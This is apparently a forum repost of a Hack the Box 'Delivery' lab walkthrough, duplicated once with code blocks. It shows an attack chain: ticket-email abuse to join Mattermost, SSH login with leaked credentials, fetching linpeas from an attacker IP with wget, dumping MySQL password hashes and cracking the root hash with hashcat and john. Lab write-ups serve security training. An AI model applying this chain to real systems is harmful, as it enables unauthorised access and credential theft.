Toni
Reverse Harem Analyst
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called âDelivery,â which is available online for those who want to increase their skills in penetration testing and Black box testing. Delivery is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level. The challenge was designed by IppSec.
Level: Easy
Task: Find user.txt and root.txt in the victimâs machine
Penetration Methodologies
Walkthrough
Network Scanning
Letâs get started then!
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned to the delivery machine: 10.129.149.209
We have added the IP Address in our /etc/hosts file as delivery.htb to make our enumeration and handling better.
Let us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine.
From the result below we found three working ports on the VM, port SSH(22), HTTP(80) and Unknown(8065).Since HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.
Since we have added the host, we can now see the website in the browser by visiting http://delivery.htb.
We clicked on helpdesk and found another link which is a subdomain for helpdesk. So, we add and update the host file /etc/hosts with helpdesk.delivery.htb
Since we have added the subdomain, we do further enumeration by visiting the subdomain http://helpdesk.delivery.htb. Which is running a support ticket system web application powered by osticket.
According to the hint we got before on the contact us page, a valid email should end with @delivery.htb domain to access the mattermost server. So, we try to open a ticket as a guest user.
So, it gave us a successful message that our ticket is created as a guest user and it also provided us with an email ([email protected]) on which replying directly will further update the ticket on the customer portal.
So, letâs leverage this feature to gain access to mattermost service.
Based on the hint we got earlier, we need @delivery.htb email to access the mattermost server. So, letâs try to enumerate the mattermost which is running on port 8065.Here we could see an option to create an account.
So, letâs sign up using the email from the support ticket, ([email protected]) which we received when we opened a new ticket.
So, to get the confirmation email we need to access the customer support portal, Letâs go back and use the check ticket option on helpdesk using the ticket id and email [email protected] to get the ticket data we opened.
Here we can see a confirmation email from mattermost server.
We copy and paste into the browser to activate the email and access mattermost server. Once verified we login and see if we can find something interesting.
On logging in there is a chance to join the internal team, Once joined there is some chat with the root user which has mentioned some SSH credentials in the chat.
There is also a message which says to stop âusing common password variations because of how easily it can be exploitedâ. So, letâs first login to server to ssh with credentials.
Once connected we can see the user.txt flag but we are first focused on getting root flagso, we immediately ran linpeas to find out some weaknesses in the server.
Since user maildeliverer is a basic user with no sudo privileges, However, there is MySQL database running because ticketing system is storing ticket details and while looking at the files we found mattermost service having writeable access and stores its configurations in path /opt/mattermost/ config/config.json.
So, after opening the config.json file we found database credentials under SqlSettings.
The database credentials are:
We connect to the database with the credentials we have found in mattermost config.json using the command below.
We check all the database available and here we only found default and mattermost database so we use mattermost database and check tables.
Since we found many tables, but we will go with user table which looks interesting so letâs check if we can find some root credentials.
As we should only be interested in root user but the problem here is that the password is in the hash.Save the password in a file called hash.
Previously a hint was given in chat by the root user that the password should be a variant of PleaseSubscribe! So, we created a custom wordlist instead on using rockyou.txt
We saved PleaseSubscribe! in a file, then created a custom variant using hashcat, there are many in /usr/share/hashcat/rules, so letâs start with the one called âbestâ.
Once our dictionary is created, we can use it to crack the hash with john the ripper.
Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.
Level: Easy
Task: Find user.txt and root.txt in the victimâs machine
Penetration Methodologies
- Scanning
- Nmap
- Enumeration
- Using /etc/hosts for custom domain
- Browsing HTTP service
- Enumerating email service
- Exploitation
- Extracting database credentials from mattermost
- Cracking Password using hashcat rule based attack
- Privilege Escalation
- Cracking the password using john the ripper
- Capturing the flag
Walkthrough
Network Scanning
Letâs get started then!
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned to the delivery machine: 10.129.149.209
We have added the IP Address in our /etc/hosts file as delivery.htb to make our enumeration and handling better.
Code:
nano /etc/hosts
10.129.149.209 delivery.htbLet us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine.
Code:
nmap -p- -A delivery.htbFrom the result below we found three working ports on the VM, port SSH(22), HTTP(80) and Unknown(8065).Since HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.
Since we have added the host, we can now see the website in the browser by visiting http://delivery.htb.
We clicked on helpdesk and found another link which is a subdomain for helpdesk. So, we add and update the host file /etc/hosts with helpdesk.delivery.htb
Code:
nano /etc/hosts
10.129.149.79 delivery.htb helpdesk.delivery.htbSince we have added the subdomain, we do further enumeration by visiting the subdomain http://helpdesk.delivery.htb. Which is running a support ticket system web application powered by osticket.
According to the hint we got before on the contact us page, a valid email should end with @delivery.htb domain to access the mattermost server. So, we try to open a ticket as a guest user.
So, it gave us a successful message that our ticket is created as a guest user and it also provided us with an email ([email protected]) on which replying directly will further update the ticket on the customer portal.
So, letâs leverage this feature to gain access to mattermost service.
Based on the hint we got earlier, we need @delivery.htb email to access the mattermost server. So, letâs try to enumerate the mattermost which is running on port 8065.Here we could see an option to create an account.
So, letâs sign up using the email from the support ticket, ([email protected]) which we received when we opened a new ticket.
So, to get the confirmation email we need to access the customer support portal, Letâs go back and use the check ticket option on helpdesk using the ticket id and email [email protected] to get the ticket data we opened.
Here we can see a confirmation email from mattermost server.
We copy and paste into the browser to activate the email and access mattermost server. Once verified we login and see if we can find something interesting.
On logging in there is a chance to join the internal team, Once joined there is some chat with the root user which has mentioned some SSH credentials in the chat.
There is also a message which says to stop âusing common password variations because of how easily it can be exploitedâ. So, letâs first login to server to ssh with credentials.
Code:
Username: maildeliverer
Password: Youve_G0t_Mail!
ssh [email protected]Once connected we can see the user.txt flag but we are first focused on getting root flagso, we immediately ran linpeas to find out some weaknesses in the server.
Code:
cd /tmp
wget 10.10.14.108:8080/linpeas.sh
chmod 777 linpeas.shSince user maildeliverer is a basic user with no sudo privileges, However, there is MySQL database running because ticketing system is storing ticket details and while looking at the files we found mattermost service having writeable access and stores its configurations in path /opt/mattermost/ config/config.json.
So, after opening the config.json file we found database credentials under SqlSettings.
Code:
cd /opt
ls
cd mattermost
ls
cd config
cat config.jsonThe database credentials are:
Code:
Username: mmuser
Password: Crack_The_MM_Admin_PWWe connect to the database with the credentials we have found in mattermost config.json using the command below.
Code:
mysql -h 127.0.0.1 -u'mmuser' -pWe check all the database available and here we only found default and mattermost database so we use mattermost database and check tables.
Code:
show database;
use mattermost;
show tables;Since we found many tables, but we will go with user table which looks interesting so letâs check if we can find some root credentials.
Code:
select Username, password from Users;As we should only be interested in root user but the problem here is that the password is in the hash.Save the password in a file called hash.
Previously a hint was given in chat by the root user that the password should be a variant of PleaseSubscribe! So, we created a custom wordlist instead on using rockyou.txt
We saved PleaseSubscribe! in a file, then created a custom variant using hashcat, there are many in /usr/share/hashcat/rules, so letâs start with the one called âbestâ.
Code:
nano file
cat file
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout file > dict.txtOnce our dictionary is created, we can use it to crack the hash with john the ripper.
Code:
john --wordlist=/root/dict.txt hash
Code:
su root
PleaseSubscribe!21
cd /root
cat root.txtAuthor: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.